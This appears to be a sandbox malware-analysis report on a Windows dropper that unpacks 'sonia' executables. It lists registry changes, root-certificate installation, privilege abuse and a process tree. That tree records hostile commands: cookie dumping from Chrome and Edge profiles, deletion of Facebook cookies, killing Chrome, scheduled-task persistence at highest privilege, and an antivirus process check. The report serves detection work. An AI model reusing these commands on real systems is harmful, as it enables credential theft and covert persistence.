Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyInternetBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLanBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCdnBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrCnt = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateBkCnt = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\FrDownloadRatePct = "90"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MonthlyUploadRestriction = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "3.191605"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyLinkLocalBytes = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Config\Geo_EndpointFullUri = "https://geo.prod.do.dsp.mp.microsoft.com/geo"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LinkLocalConnectionCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownlinkUsageBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkUsageBps = "0"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadMonthlyInternetBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UplinkBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\PriorityDownloadCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4188"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Settings	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyGroupBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "1"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CacheSizeBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\LANConnectionCount = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "2.884555"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\SwarmCount = "0"	svchost.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\CPUpct = "9.999488"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyCacheHostBytes = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\DownloadMonthlyRateFrBps = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\UploadRatePct = "100"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\NormalDownloadCount = "0"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\DeliveryOptimization\Usage\MemoryUsageKB = "4376"	svchost.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

sonia_3.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	sonia_3.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349\Blob = 5c000000010000000400000000080000090000000100000054000000305206082b0601050507030206082b06010505070303060a2b0601040182370a030406082b0601050507030406082b0601050507030606082b0601050507030706082b0601050507030106082b0601050507030853000000010000004300000030413022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c0620000000100000020000000d7a7a0fb5d7e2731d771e9484ebcdef71d5f0c3e0a2948782bc83ee0ea699ef40b000000010000001c0000005300650063007400690067006f002000280041004100410029000000140000000100000014000000a0110a233e96f107ece2af29ef82a57fd030a4b41d00000001000000100000002e0d6875874a44c820912e85e964cfdb030000000100000014000000d1eb23a46d17d68fd92564c2f1f1601764d8e349200000000100000036040000308204323082031aa003020102020101300d06092a864886f70d0101050500307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c18414141204365727469666963617465205365727669636573301e170d3034303130313030303030305a170d3238313233313233353935395a307b310b3009060355040613024742311b301906035504080c1247726561746572204d616e636865737465723110300e06035504070c0753616c666f7264311a3018060355040a0c11436f6d6f646f204341204c696d697465643121301f06035504030c1841414120436572746966696361746520536572766963657330820122300d06092a864886f70d01010105000382010f003082010a0282010100be409df46ee1ea76871c4d45448ebe46c883069dc12afe181f8ee402faf3ab5d508a16310b9a06d0c57022cd492d5463ccb66e68460b53eacb4c24c0bc724eeaf115aef4549a120ac37ab23360e2da8955f32258f3dedccfef8386a28c944f9f68f29890468427c776bfe3cc352c8b5e07646582c048b0a891f9619f762050a891c766b5eb78620356f08a1a13ea31a31ea099fd38f6f62732586f07f56bb8fb142bafb7aaccd6635f738cda0599a838a8cb17783651ace99ef4783a8dcf0fd942e2980cab2f9f0e01deef9f9949f12ddfac744d1b98b547c5e529d1f99018c7629cbe83c7267b3e8a25c7c0dd9de6356810209d8fd8ded2c3849c0d5ee82fc90203010001a381c03081bd301d0603551d0e04160414a0110a233e96f107ece2af29ef82a57fd030a4b4300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff307b0603551d1f047430723038a036a0348632687474703a2f2f63726c2e636f6d6f646f63612e636f6d2f414141436572746966696361746553657276696365732e63726c3036a034a0328630687474703a2f2f63726c2e636f6d6f646f2e6e65742f414141436572746966696361746553657276696365732e63726c300d06092a864886f70d010105050003820101000856fc02f09be8ffa4fad67bc64480ce4fc4c5f60058cca6b6bc1449680476e8e6ee5dec020f60d68d50184f264e01e3e6b0a5eebfbc745441bffdfc12b8c74f5af48960057f60b7054af3f6f1c2bfc4b97486b62d7d6bccd2f346dd2fc6e06ac3c334032c7d96dd5ac20ea70a99c1058bab0c2ff35c3acf6c37550987de53406c58effcb6ab656e04f61bdc3ce05a15c69ed9f15948302165036cece92173ec9b03a1e037ada015188ffaba02cea72ca910132cd4e50826ab229760f8905e74d4a29a53bdf2a968e0a26ec2d76cb1a30f9ebfeb68e756f2aef2e32b383a0981b56b85d7be2ded3f1ab7b263e2f5622c82d46a004150f139839f95e93696986e	sonia_3.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

sonia_2.exeWerFault.exe

pid	process
3464	sonia_2.exe
3464	sonia_2.exe
672	WerFault.exe
672	WerFault.exe
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372
2372

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2372
Suspicious behavior: MapViewOfSection 2 IoCs

Processes:

sonia_2.exeF_yQ5w_D1E2yEyJ3gHsDK_1G.exe

pid process

3464 sonia_2.exe
4332 F_yQ5w_D1E2yEyJ3gHsDK_1G.exe

pid	process
2372

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

sonia_6.exeWerFault.exechrome2.exeTiWorker.exeMJGc8tEmO8iAMzorOZWCjESu.exe

description	pid	process
Token: SeDebugPrivilege	4004	sonia_6.exe
Token: SeRestorePrivilege	672	WerFault.exe
Token: SeBackupPrivilege	672	WerFault.exe
Token: SeDebugPrivilege	1520	chrome2.exe
Token: SeShutdownPrivilege	2372
Token: SeCreatePagefilePrivilege	2372
Token: SeSecurityPrivilege	208	TiWorker.exe
Token: SeRestorePrivilege	208	TiWorker.exe
Token: SeBackupPrivilege	208	TiWorker.exe
Token: SeCreateTokenPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeAssignPrimaryTokenPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeLockMemoryPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeIncreaseQuotaPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeMachineAccountPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeTcbPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeSecurityPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeTakeOwnershipPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeLoadDriverPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeSystemProfilePrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeSystemtimePrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeProfSingleProcessPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeIncBasePriorityPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeCreatePagefilePrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeCreatePermanentPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeBackupPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeRestorePrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeShutdownPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeDebugPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeAuditPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeSystemEnvironmentPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeChangeNotifyPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeRemoteShutdownPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeUndockPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeSyncAgentPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeEnableDelegationPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeManageVolumePrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeImpersonatePrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeCreateGlobalPrivilege	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: 31	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: 32	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: 33	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: 34	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: 35	4104	MJGc8tEmO8iAMzorOZWCjESu.exe
Token: SeShutdownPrivilege	2372
Token: SeCreatePagefilePrivilege	2372
Token: SeShutdownPrivilege	2372
Token: SeCreatePagefilePrivilege	2372
Token: SeShutdownPrivilege	2372
Token: SeCreatePagefilePrivilege	2372
Token: SeShutdownPrivilege	2372
Token: SeCreatePagefilePrivilege	2372
Token: SeShutdownPrivilege	2372
Token: SeCreatePagefilePrivilege	2372
Token: SeShutdownPrivilege	2372
Token: SeCreatePagefilePrivilege	2372
Token: SeShutdownPrivilege	2372
Token: SeCreatePagefilePrivilege	2372
Token: SeShutdownPrivilege	2372
Token: SeCreatePagefilePrivilege	2372
Token: SeShutdownPrivilege	2372
Token: SeCreatePagefilePrivilege	2372
Token: SeShutdownPrivilege	2372
Token: SeCreatePagefilePrivilege	2372
Token: SeShutdownPrivilege	2372

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

385857ed4b81203701b636672da6a4a16a336a8a318832eb21fae0430291f999.exesetup_install.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.execmd.exesonia_5.exesonia_1.exesonia_9.exe

description	pid	process	target process
PID 2156 wrote to memory of 1280	2156	385857ed4b81203701b636672da6a4a16a336a8a318832eb21fae0430291f999.exe	setup_install.exe
PID 2156 wrote to memory of 1280	2156	385857ed4b81203701b636672da6a4a16a336a8a318832eb21fae0430291f999.exe	setup_install.exe
PID 2156 wrote to memory of 1280	2156	385857ed4b81203701b636672da6a4a16a336a8a318832eb21fae0430291f999.exe	setup_install.exe
PID 1280 wrote to memory of 3120	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 3120	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 3120	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 2980	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 2980	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 2980	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 1552	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 1552	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 1552	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 2132	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 2132	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 2132	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 100	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 100	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 100	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 808	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 808	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 808	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 4036	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 4036	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 4036	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 2068	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 2068	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 2068	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 2516	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 2516	1280	setup_install.exe	cmd.exe
PID 1280 wrote to memory of 2516	1280	setup_install.exe	cmd.exe
PID 100 wrote to memory of 3104	100	cmd.exe	sonia_5.exe
PID 100 wrote to memory of 3104	100	cmd.exe	sonia_5.exe
PID 100 wrote to memory of 3104	100	cmd.exe	sonia_5.exe
PID 1552 wrote to memory of 2628	1552	cmd.exe	sonia_3.exe
PID 1552 wrote to memory of 2628	1552	cmd.exe	sonia_3.exe
PID 1552 wrote to memory of 2628	1552	cmd.exe	sonia_3.exe
PID 2980 wrote to memory of 3464	2980	cmd.exe	sonia_2.exe
PID 2980 wrote to memory of 3464	2980	cmd.exe	sonia_2.exe
PID 2980 wrote to memory of 3464	2980	cmd.exe	sonia_2.exe
PID 2132 wrote to memory of 3948	2132	cmd.exe	sonia_4.exe
PID 2132 wrote to memory of 3948	2132	cmd.exe	sonia_4.exe
PID 2132 wrote to memory of 3948	2132	cmd.exe	sonia_4.exe
PID 2068 wrote to memory of 3920	2068	cmd.exe	sonia_8.exe
PID 2068 wrote to memory of 3920	2068	cmd.exe	sonia_8.exe
PID 2068 wrote to memory of 3920	2068	cmd.exe	sonia_8.exe
PID 4036 wrote to memory of 876	4036	cmd.exe	sonia_7.exe
PID 4036 wrote to memory of 876	4036	cmd.exe	sonia_7.exe
PID 4036 wrote to memory of 876	4036	cmd.exe	sonia_7.exe
PID 3120 wrote to memory of 3916	3120	cmd.exe	sonia_1.exe
PID 3120 wrote to memory of 3916	3120	cmd.exe	sonia_1.exe
PID 3120 wrote to memory of 3916	3120	cmd.exe	sonia_1.exe
PID 808 wrote to memory of 4004	808	cmd.exe	sonia_6.exe
PID 808 wrote to memory of 4004	808	cmd.exe	sonia_6.exe
PID 2516 wrote to memory of 1816	2516	cmd.exe	sonia_9.exe
PID 2516 wrote to memory of 1816	2516	cmd.exe	sonia_9.exe
PID 2516 wrote to memory of 1816	2516	cmd.exe	sonia_9.exe
PID 3104 wrote to memory of 1560	3104	sonia_5.exe	sonia_5.tmp
PID 3104 wrote to memory of 1560	3104	sonia_5.exe	sonia_5.tmp
PID 3104 wrote to memory of 1560	3104	sonia_5.exe	sonia_5.tmp
PID 3916 wrote to memory of 2140	3916	sonia_1.exe	sonia_1.exe
PID 3916 wrote to memory of 2140	3916	sonia_1.exe	sonia_1.exe
PID 3916 wrote to memory of 2140	3916	sonia_1.exe	sonia_1.exe
PID 1816 wrote to memory of 4088	1816	sonia_9.exe	jfiag3g_gg.exe
PID 1816 wrote to memory of 4088	1816	sonia_9.exe	jfiag3g_gg.exe

C:\Users\Admin\AppData\Local\Temp\385857ed4b81203701b636672da6a4a16a336a8a318832eb21fae0430291f999.exe
"C:\Users\Admin\AppData\Local\Temp\385857ed4b81203701b636672da6a4a16a336a8a318832eb21fae0430291f999.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2156

C:\Users\Admin\AppData\Local\Temp\7zSC68A515E\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zSC68A515E\setup_install.exe"
2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1280

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sonia_9.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2516

C:\Users\Admin\AppData\Local\Temp\7zSC68A515E\sonia_9.exe
sonia_9.exe
4⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1816

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:4088

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /DeleteCookiesWildcard "*.facebook.com"
5⤵
- Executes dropped EXE
PID:456

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:2924

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
5⤵
- Executes dropped EXE
PID:2536

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:3996

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
5⤵
- Executes dropped EXE
PID:3552

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
5⤵
- Executes dropped EXE
PID:112

C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
5⤵
- Executes dropped EXE
PID:3240

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sonia_8.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:2068

C:\Users\Admin\AppData\Local\Temp\7zSC68A515E\sonia_8.exe
sonia_8.exe
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3920

C:\Users\Admin\AppData\Local\Temp\7zSC68A515E\sonia_8.exe
C:\Users\Admin\AppData\Local\Temp\7zSC68A515E\sonia_8.exe
5⤵
- Executes dropped EXE
PID:180

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c sonia_7.exe
3⤵
- Suspicious use of WriteProcessMemory
PID:4036

C:\Users\Admin\AppData\Local\Temp\7zSC68A515E\sonia_7.exe
sonia_7.exe
4⤵
- Executes dropped EXE
- Checks computer location settings
PID:876

C:\Users\Admin\Documents\MJGc8tEmO8iAMzorOZWCjESu.exe
"C:\Users\Admin\Documents\MJGc8tEmO8iAMzorOZWCjESu.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4104

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
6⤵
PID:4204

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
7⤵
- Kills process with taskkill
PID:5724

C:\Users\Admin\Documents\B_bff2T4G6cqvc7fB94uMZO2.exe
"C:\Users\Admin\Documents\B_bff2T4G6cqvc7fB94uMZO2.exe"
5⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:3204

C:\Users\Admin\Documents\B_bff2T4G6cqvc7fB94uMZO2.exe
C:\Users\Admin\Documents\B_bff2T4G6cqvc7fB94uMZO2.exe
6⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
- Executes dropped EXE
PID:4988

C:\Users\Admin\Documents\jD9EuR4xXuLRvbqoJiTAQk1P.exe
"C:\Users\Admin\Documents\jD9EuR4xXuLRvbqoJiTAQk1P.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
- Drops file in Program Files directory
PID:1404

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
6⤵
- Creates scheduled task(s)
PID:4808

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
6⤵
- Creates scheduled task(s)
PID:3140

C:\Users\Admin\Documents\wsgQaZyRBY6I22XzDjrAFg3B.exe
"C:\Users\Admin\Documents\wsgQaZyRBY6I22XzDjrAFg3B.exe"
6⤵
- Executes dropped EXE
- Checks computer location settings
PID:4896

C:\Users\Admin\Pictures\Adobe Films\LzOmlSZBIM1NZxqWqE7LGb6V.exe
"C:\Users\Admin\Pictures\Adobe Films\LzOmlSZBIM1NZxqWqE7LGb6V.exe"
7⤵
PID:3044

C:\Users\Admin\Pictures\Adobe Films\0l4CTBp49adTe7tc6jS2brmy.exe
"C:\Users\Admin\Pictures\Adobe Films\0l4CTBp49adTe7tc6jS2brmy.exe"
7⤵
PID:6056

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 616
8⤵
- Program crash
PID:5420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 624
8⤵
- Program crash
PID:3248

C:\Users\Admin\Pictures\Adobe Films\6Otr_B4CqHROYFU3tMrOD8hW.exe
"C:\Users\Admin\Pictures\Adobe Films\6Otr_B4CqHROYFU3tMrOD8hW.exe"
7⤵
PID:5740

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\PDSIHzLf.cPl",
8⤵
PID:2924

C:\Users\Admin\Pictures\Adobe Films\RWjNkbUAF2LANAulQQraja7w.exe
"C:\Users\Admin\Pictures\Adobe Films\RWjNkbUAF2LANAulQQraja7w.exe"
7⤵
PID:5488

C:\Users\Admin\Pictures\Adobe Films\hSkQLImkbD3LlSc2zpbxXv5j.exe
"C:\Users\Admin\Pictures\Adobe Films\hSkQLImkbD3LlSc2zpbxXv5j.exe"
7⤵
PID:1900

C:\Users\Admin\Documents\d1KD7boUYITDfV4ldu4GYrik.exe
"C:\Users\Admin\Documents\d1KD7boUYITDfV4ldu4GYrik.exe"
5⤵
- Executes dropped EXE
PID:4192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 624
6⤵
- Program crash
- Checks processor information in registry
- Enumerates system info in registry
PID:5064

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 660
6⤵
- Program crash
PID:6140

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4192 -s 588
6⤵
- Program crash
PID:3204

C:\Users\Admin\Documents\lkD6OGvmC6_qaaC1cqneKzYq.exe
"C:\Users\Admin\Documents\lkD6OGvmC6_qaaC1cqneKzYq.exe"
5⤵
- Executes dropped EXE
PID:4220

C:\Users\Admin\Documents\CfUyEvxxRL5Szh6kGVp4IPfg.exe
"C:\Users\Admin\Documents\CfUyEvxxRL5Szh6kGVp4IPfg.exe"
5⤵
- Executes dropped EXE
PID:4288

C:\Users\Admin\Documents\F_yQ5w_D1E2yEyJ3gHsDK_1G.exe
"C:\Users\Admin\Documents\F_yQ5w_D1E2yEyJ3gHsDK_1G.exe"
5⤵
- Executes dropped EXE
PID:4300

C:\Users\Admin\Documents\F_yQ5w_D1E2yEyJ3gHsDK_1G.exe
"C:\Users\Admin\Documents\F_yQ5w_D1E2yEyJ3gHsDK_1G.exe"
6⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
PID:4332

C:\Users\Admin\Documents\oTXQ24rCEMhZJFguArsFP_yJ.exe
"C:\Users\Admin\Documents\oTXQ24rCEMhZJFguArsFP_yJ.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:4212

C:\Windows\SysWOW64\svchost.exe
"C:\Windows\System32\svchost.exe"
6⤵
PID:3816

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Detto.xla
6⤵
PID:1208

C:\Windows\SysWOW64\cmd.exe
cmd
7⤵
PID:5676

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
8⤵
- Enumerates processes with tasklist
PID:5596

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
8⤵
PID:4912

